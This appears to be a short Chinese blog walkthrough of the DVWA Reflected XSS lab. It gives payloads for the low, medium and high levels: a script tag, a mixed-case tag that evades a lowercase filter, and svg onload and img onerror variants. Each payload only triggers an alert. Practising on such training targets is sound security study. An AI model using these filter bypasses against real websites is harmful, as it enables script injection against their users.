一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
mjhcsp9 小时前
博客安全攻防演练:从实战视角构建全方位防护体系2401_8653825010 小时前
工信部发布→《云计算综合标准化体系建设指南(2025版)》Bruce_Liuxiaowei11 小时前
Windows系统错误6118全面解决方案:修复此工作组的服务器列表当前无法使用Whoami!1 天前
5-4〔OSCP ◈ 研记〕❘ SQL注入攻击▸基于 UNION 的SQLiMoshow郑锴2 天前
CSP 配置指南:SpringBoot/Express 实操 + 多域名适配,防 XSS 攻击超简单清风细雨_林木木2 天前
HttpOnly 是怎么防止 XSS 攻击的?christine-rr2 天前
linux常用命令(6)——网络管理合作小小程序员小小店2 天前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))啦啦9117142 天前
Wise Duplicate Finder查重清理软件!一键查重,支持批量处理!我不是QI2 天前
DES 加密算法:核心组件、加解密流程与安全特性